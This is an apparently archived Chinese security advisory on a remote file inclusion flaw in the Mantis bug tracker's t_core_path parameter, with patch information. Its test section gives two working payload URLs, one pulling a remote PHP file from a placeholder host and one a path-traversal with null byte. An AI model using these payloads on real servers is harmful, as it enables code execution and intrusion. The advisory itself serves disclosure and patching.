发布日期：2005-10-27
更新日期：2005-10-27

受影响系统：

Mantis mantis 1.0.0rc2
Mantis mantis 0.19.2

不受影响系统：

Mantis mantis 0.19.3

描述：

---

BUGTRAQ  ID: 15212

Mantis是用PHP脚本语言编写的基于web的漏洞跟踪系统。

Mantis中存在文件包含漏洞，远程攻击者可能以Web Server进程的权限执行任意代码。

由于没有正确的过滤"bug_sponsorship_list_view_inc.php"中对"t_core_path"参数的输入，攻击者可以包含任意本地或外部文件。

<*来源：Andreas Sandblad （sandblad@acc.umu.se）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113034456922188&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=http://[host]/[file].php?
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../[file]%00

建议：

---

厂商补丁：

Mantis
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

* Mantis Upgrade mantis-0.19.3.tar.gz
http://prdownloads.sourceforge.net/mantisbt/mantis-0.19.3.tar.gz

浏览次数：3115
严重程度：0（网友投票）